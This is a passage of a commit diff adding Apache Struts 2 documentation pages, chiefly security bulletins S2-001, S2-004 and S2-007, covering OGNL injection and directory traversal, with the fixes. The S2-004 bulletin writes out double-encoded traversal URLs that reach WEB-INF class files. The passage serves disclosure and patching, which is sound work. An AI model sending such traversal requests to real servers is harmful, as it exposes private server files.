+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>Roles Interceptor</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="guides.html">Guides</a>&nbsp;&gt;&nbsp;<a href="core-developers-guide.html">Core Developers Guide</a>&nbsp;&gt;&nbsp;<a href="interceptors.html">Interceptors</a>&nbsp;&gt;&nbsp;<a href="roles-interceptor.html">Roles Interceptor</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">Roles Interceptor</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=28547">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=28547">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=28547">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=28547">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=28547">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=28547">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><p>will only be executed if the user has the correct role. </p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/s2-001.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-001.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-001.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,178 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <link href='http://struts.apache.org/highlighter/style/shCoreStruts.css' rel='stylesheet' type='text/css' />
+    <link href='http://struts.apache.org/highlighter/style/shThemeStruts.css' rel='stylesheet' type='text/css' />
+    <script src='http://struts.apache.org/highlighter/js/shCore.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushJava.js' type='text/javascript'></script>
+            <script src='http://struts.apache.org/highlighter/js/shBrushXml.js' type='text/javascript'></script>
+    
+    <script type="text/javascript">
+        SyntaxHighlighter.defaults['toolbar'] = false;
+        SyntaxHighlighter.all();
+    </script>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-001</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-001.html">S2-001</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-001</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=61776">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=61776">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=61776">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=61776">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=61776">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=61776">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-001-Summary"></a>Summary</h2>
+
+
+<p>Remote code exploit on form validation error</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh">Who should read this</th><td colspan="1" rowspan="1" class="confluenceTd">All Struts 2 developers</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Impact of vulnerability</th><td colspan="1" rowspan="1" class="confluenceTd">Remote code execution</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Maximum security rating</th><td colspan="1" rowspan="1" class="confluenceTd">Critical</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Recommendation</th><td colspan="1" rowspan="1" class="confluenceTd">Developers should immediately upgrade to <a shape="rect" class="external-link" href="http://people.apache.org/builds/struts/2.0.9/">Struts 2.0.9</a> or upgrade to <a shape="rect" class="external-link" href="http://www.opensymphony.com/xwork/download.action" rel="nofollow">XWork 2.0.4</a></td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Affected Software<
 /th><td colspan="1" rowspan="1" class="confluenceTd"> WebWork 2.1 (with altSyntax enabled), WebWork 2.2.0 - WebWork 2.2.5, Struts 2.0.0 - Struts 2.0.8 </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Non-Affected Software</th><td colspan="1" rowspan="1" class="confluenceTd"> WebWork 2.0, WebWork 2.1 (with altSyntax disabled, which is the default)</td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh">Original JIRA Ticket</th><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" class="external-link" href="http://issues.apache.org/struts/browse/WW-2030">WW-2030</a></td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-001-Problem"></a>Problem</h2>
+
+<p>The 'altSyntax' feature of WebWork 2.1+ and Struts 2 allows OGNL expressions to be inserted into text strings and is processed recursively.  This allows a malicious user to submit a string, usually through an HTML text field, containing an OGNL expression that will then be executed by the server if the form validation has failed.  For example, say we had this form that required the 'phoneNumber' field to not be blank:</p>
+
+<div class="code panel" style="border-width: 1px;"><div class="codeContent panelContent">
+<script class="theme: Default; brush: html; gutter: false" type="syntaxhighlighter"><![CDATA[
+&lt;s:form action="editUser"&gt;
+  &lt;s:textfield name="name" /&gt;
+  &lt;s:textfield name="phoneNumber" /&gt;
+&lt;/s:form&gt;
+]]></script>
+</div></div>
+
+<p>The user could leave the 'phoneNumber' field blank to trigger the validation error, then populate the 'name' field with %{1+1}.  When the form is re-displayed to the user, the value of the 'name' field will be '2'.  The reason is the value field is, by default, processed as %{name}, and since OGNL expressions are evaluated recursively, it is evaluated as if the expression was %{%{1+1}}.</p>
+
+<p>The OGNL parsing code is actually in XWork and not in WebWork 2 or Struts 2.</p>
+
+<h2><a shape="rect" name="S2-001-Solution"></a>Solution</h2>
+
+<p>As of XWork 2.0.4, the OGNL parsing is changed so that it is not recursive.  Therefore, in the example above, the result will be the expected %{1+1}.  You can either obtain the <a shape="rect" class="external-link" href="http://www.opensymphony.com/webwork/download.action" rel="nofollow">WebWork 2.0.4</a> or <a shape="rect" class="external-link" href="http://people.apache.org/builds/struts/2.0.9/">Struts 2.0.9</a>, which contains the corrected XWork library.  Alternatively, you can obtain the patch and apply it to the XWork source code yourself. </p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/s2-004.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-004.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-004.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,164 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-004</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-004.html">S2-004</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-004</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=99572">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=99572">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=99572">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=99572">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=99572">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=99572">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-004-Summary"></a>Summary</h2>
+
+<p>Directory traversal vulnerability while serving static content</p>
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh"> Who should read this </th><td colspan="1" rowspan="1" class="confluenceTd"> All Struts 2 developers </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Impact of vulnerability </th><td colspan="1" rowspan="1" class="confluenceTd"> Read access to server filesystem resources (under certain application server environments) </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Maximum security rating </th><td colspan="1" rowspan="1" class="confluenceTd"> Important </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Recommendation </th><td colspan="1" rowspan="1" class="confluenceTd"> Developers should upgrade to <a shape="rect" class="external-link" href="http://people.apache.org/builds/struts/2.0.12/">Struts 2.0.12</a> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Affected Software </th><td colspan="1" rowspan="1" class="confluenceTd"> Struts 2
 .0.0 - Struts 2.0.11.2 </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Original JIRA Ticket </th><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" class="external-link" href="https://issues.apache.org/struts/browse/WW-2779">WW-2779</a> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Reporter </th><td colspan="1" rowspan="1" class="confluenceTd"> Csaba Barta and L&#225;szl&#243; T&#243;th, PricewaterhouseCoopers </td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-004-Problem"></a>Problem</h2>
+
+<p>The Struts2 dispatcher logic by design allows to serve certain static resources found in the classpath of the web application for request URIs having a context relative path starting with "/struts/".</p>
+
+<p>FilterDispatcher (in 2.0) and DefaultStaticContentLoader (in 2.1) have a security vulnerability that allows an attacker to traverse the directory structure and download files outside the "static" content folder, using double-encoded urls and relative paths, like:</p>
+
+<p><a shape="rect" class="external-link" href="http://localhost:8080/struts2-blank-2.0.11.1/struts" rel="nofollow">http://localhost:8080/struts2-blank-2.0.11.1/struts</a>..</p>
+
+<p><a shape="rect" class="external-link" href="http://localhost:8080/struts2-blank-2.0.11.1/struts/..%252f" rel="nofollow">http://localhost:8080/struts2-blank-2.0.11.1/struts/..%252f</a></p>
+
+<p><a shape="rect" class="external-link" href="http://exampletomcat.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Login.class/" rel="nofollow">http://exampletomcat.com:8080/struts2-blank-2.0.11.1/struts/..%252f..%252f..%252fWEB-INF/classess/example/Login.class/</a></p>
+
+<p>Although not all container are vulnerable to this, the Struts2 dispatcher logic has to prevent access to static content outside the static resource folders.</p>
+
+<h2><a shape="rect" name="S2-004-Solution"></a>Solution</h2>
+
+<p>As of Struts 2.0.12, the dispatcher logic was improved to correctly decode and normalize the request path before checking if static content serving applies for a given request.</p>
+
+<p>You can obtain <a shape="rect" class="external-link" href="http://people.apache.org/builds/struts/2.0.12/">Struts 2.0.12</a> as a drop in replacement for Struts 2.0.11.2 to get the fixed Struts 2 core library.</p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file

Added: websites/production/struts/content/development/2.x/docs/s2-007.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-007.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-007.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,156 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
+regarding copyright ownership.  The ASF licenses this file
+to you under the Apache License, Version 2.0 (the
+"License"); you may not use this file except in compliance
+with the License.  You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+Unless required by applicable law or agreed to in writing,
+software distributed under the License is distributed on an
+"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
+KIND, either express or implied.  See the License for the
+specific language governing permissions and limitations
+under the License. 
+-->
+<html>
+<head>
+    <LINK type="text/css" rel="stylesheet" href="https://struts.apache.org/css/default.css">
+    <style type="text/css">
+        .dp-highlighter {
+            width:95% !important;
+        }
+    </style>
+    <style type="text/css">
+        .footer {
+            background-image:      url('https://cwiki.apache.org/confluence/images/border/border_bottom.gif');
+            background-repeat:     repeat-x;
+            background-position:   left top;
+            padding-top:           4px;
+            color:                 #666;
+        }
+    </style>
+    <script type="text/javascript" language="javascript">
+        var hide = null;
+        var show = null;
+        var children = null;
+
+        function init() {
+            /* Search form initialization */
+            var form = document.forms['search'];
+            if (form != null) {
+                form.elements['domains'].value = location.hostname;
+                form.elements['sitesearch'].value = location.hostname;
+            }
+
+            /* Children initialization */
+            hide = document.getElementById('hide');
+            show = document.getElementById('show');
+            children = document.all != null ?
+                    document.all['children'] :
+                    document.getElementById('children');
+            if (children != null) {
+                children.style.display = 'none';
+                show.style.display = 'inline';
+                hide.style.display = 'none';
+            }
+        }
+
+        function showChildren() {
+            children.style.display = 'block';
+            show.style.display = 'none';
+            hide.style.display = 'inline';
+        }
+
+        function hideChildren() {
+            children.style.display = 'none';
+            show.style.display = 'inline';
+            hide.style.display = 'none';
+        }
+    </script>
+    <title>S2-007</title>
+</head>
+<body onload="init()">
+<table border="0" cellpadding="2" cellspacing="0" width="100%">
+    <tr class="topBar">
+        <td align="left" valign="middle" class="topBarDiv" align="left" nowrap>
+            &nbsp;<a href="home.html">Home</a>&nbsp;&gt;&nbsp;<a href="security-bulletins.html">Security Bulletins</a>&nbsp;&gt;&nbsp;<a href="s2-007.html">S2-007</a>
+        </td>
+        <td align="right" valign="middle" nowrap>
+            <form name="search" action="http://www.google.com/search" method="get">
+                <input type="hidden" name="ie" value="UTF-8" />
+                <input type="hidden" name="oe" value="UTF-8" />
+                <input type="hidden" name="domains" value="" />
+                <input type="hidden" name="sitesearch" value="" />
+                <input type="text" name="q" maxlength="255" value="" />
+                <input type="submit" name="btnG" value="Google Search" />
+            </form>
+        </td>
+    </tr>
+</table>
+
+<div id="PageContent">
+    <div class="pageheader" style="padding: 6px 0px 0px 0px;">
+        <!-- We'll enable this once we figure out how to access (and save) the logo resource -->
+        <!--img src="/wiki/images/confluence_logo.gif" style="float: left; margin: 4px 4px 4px 10px;" border="0"-->
+        <div style="margin: 0px 10px 0px 10px" class="smalltext">Apache Struts 2 Documentation</div>
+        <div style="margin: 0px 10px 8px 10px"  class="pagetitle">S2-007</div>
+
+        <div class="greynavbar" align="right" style="padding: 2px 10px; margin: 0px;">
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=27826393">
+                <img src="https://cwiki.apache.org/confluence/images/icons/notep_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Edit Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/editpage.action?pageId=27826393">Edit Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">
+                <img src="https://cwiki.apache.org/confluence/images/icons/browse_space.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Browse Space"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/listpages.action?key=WW">Browse Space</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=27826393">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_page_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add Page"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createpage.action?spaceKey=WW&fromPageId=27826393">Add Page</a>
+            &nbsp;
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=27826393">
+                <img src="https://cwiki.apache.org/confluence/images/icons/add_blogentry_16.gif"
+                     height="16" width="16" border="0" align="absmiddle" title="Add News"></a>
+            <a href="https://cwiki.apache.org/confluence/pages/createblogpost.action?spaceKey=WW&fromPageId=27826393">Add News</a>
+        </div>
+    </div>
+
+    <div class="pagecontent">
+        <div class="wiki-content">
+            <div id="ConfluenceContent"><h2><a shape="rect" name="S2-007-Summary"></a>Summary</h2>
+
+
+<p>User input is evaluated as an OGNL expression when there's a conversion error</p>
+
+
+<div class="table-wrap">
+<table class="confluenceTable"><tbody><tr><th colspan="1" rowspan="1" class="confluenceTh"> Who should read this </th><td colspan="1" rowspan="1" class="confluenceTd"> All Struts 2 developers </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Impact of vulnerability </th><td colspan="1" rowspan="1" class="confluenceTd"> Remote Code Execution </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Maximum security rating </th><td colspan="1" rowspan="1" class="confluenceTd"> Important </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Recommendation </th><td colspan="1" rowspan="1" class="confluenceTd"> Developers should either upgrade to <a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts2231">Struts 2.2.3.1</a> or apply the configuration changes described below </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Affected Software </th><td colspan="1" rowspan="1" class="confluenceTd"> Struts 2.0.0 - S
 truts 2.2.3 </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Original JIRA Tickets </th><td colspan="1" rowspan="1" class="confluenceTd"> <a shape="rect" class="external-link" href="https://issues.apache.org/jira/browse/WW-3668">WW-3668</a> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> Reporter </th><td colspan="1" rowspan="1" class="confluenceTd"> Hideyuki Suzumi<br clear="none" class="atl-forced-newline"> </td></tr><tr><th colspan="1" rowspan="1" class="confluenceTh"> CVE Identifier </th><td colspan="1" rowspan="1" class="confluenceTd"> - </td></tr></tbody></table>
+</div>
+
+
+<h2><a shape="rect" name="S2-007-Problem"></a>Problem</h2>
+
+<p>User input is evaluated as an OGNL expression when there's a conversion error. This allows a malicious user to execute arbitrary code.&#160;<br clear="none">
+A more detailed description is found in the referenced <a shape="rect" class="external-link" href="https://issues.apache.org/jira/browse/WW-3668">JIRA ticket</a>.</p>
+
+<h2><a shape="rect" name="S2-007-Solution"></a>Solution</h2>
+
+<p>Upgrade to&#160;<a shape="rect" class="external-link" href="http://struts.apache.org/download.cgi#struts2231">Struts 2.2.3.1</a>.</p></div>
+        </div>
+
+        
+    </div>
+</div>
+<div class="footer">
+    Generated by CXF SiteExporter
+</div>
+</body>
+</html>
\ No newline at end of file
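Review bot: The Recommendation row in the summary table tells developers to "either upgrade to Struts 2.2.3.1 or apply the configuration changes described below", but the Solution section that follows contains only the upgrade sentence, so the promised configuration-based mitigation is never given. Either the row should drop the "or apply the configuration changes described below" clause, or the Solution section needs the missing mitigation text. The CVE Identifier cell reads `-`; if an identifier exists for this issue it should be filled in so the bulletin is findable by CVE, as the S2-009 bulletin's table is.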

Added: websites/production/struts/content/development/2.x/docs/s2-009.html
==============================================================================
--- websites/production/struts/content/development/2.x/docs/s2-009.html (added)
+++ websites/production/struts/content/development/2.x/docs/s2-009.html Wed Jul 17 09:31:08 2013
@@ -0,0 +1,243 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<!-- 
+Licensed to the Apache Software Foundation (ASF) under one
+or more contributor license agreements.  See the NOTICE file
+distributed with this work for additional information
